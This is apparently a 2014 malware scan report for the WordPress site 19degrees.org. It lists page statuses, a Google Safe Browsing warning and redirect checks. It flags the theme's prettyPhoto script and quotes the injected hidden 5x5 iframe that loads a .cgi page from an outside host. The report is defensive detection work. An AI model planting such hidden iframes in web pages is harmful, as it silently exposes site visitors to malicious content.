Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=19degrees.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://19degrees.org/ | 200 OK Content-Length: 20153 Content-Type: text/html | clean |
http://19degrees.org/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/tabs.min.js?ver=1.3 | 200 OK Content-Length: 4714 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/custom.js?ver=1.3 | 200 OK Content-Length: 45927 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/cufon-yui.js?ver=1.3 | 200 OK Content-Length: 18257 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/fonts/colaboratethin.js?ver=1.3 | 200 OK Content-Length: 48871 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/fonts/colaboratemedium.js?ver=1.3 | 200 OK Content-Length: 48862 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/fonts/colaboratebold.js?ver=1.3 | 200 OK Content-Length: 48519 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/fonts/dejavu.js?ver=1.3 | 200 OK Content-Length: 42273 Content-Type: application/javascript | clean |
http://19degrees.org/wp-content/themes/dejavu/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=1.3 | 200 OK Content-Length: 23682 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.prettyPhoto={version:'3.1.2'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({animation_speed:'fast',slideshow:5000,autoplay_slideshow:false,opacity:0.80,show_title:true,allow_resize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'pp_default',horizontal_padding:20,hideflash:false,wmode:'opaque',autoplay:true,modal:false,deeplinking:true,overlay_gallery:true,keyboard_shortcuts:true,changepicturecallback:function(){},callback:function() Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8 <iframe src="http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://19degrees.org/?page_id=4 | 200 OK Content-Length: 14786 Content-Type: text/html | clean |
http://19degrees.org/?page_id=36 | 200 OK Content-Length: 19232 Content-Type: text/html | clean |
http://19degrees.org/?page_id=38 | 200 OK Content-Length: 14913 Content-Type: text/html | clean |
http://19degrees.org/?page_id=40 | 200 OK Content-Length: 13683 Content-Type: text/html | clean |
http://19degrees.org/?page_id=42 | 200 OK Content-Length: 15953 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 19degrees.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 03:42:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://19degrees.org/xmlrpc.php
GET / HTTP/1.1
Host: 19degrees.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 03:42:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://19degrees.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: 19degrees.org
Referer: http://www.google.com/search?q=19degrees.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 19degrees.org
Referer: http://www.google.com/search?q=19degrees.org
Result:
The result is similar to the first query. There are no suspicious redirects found.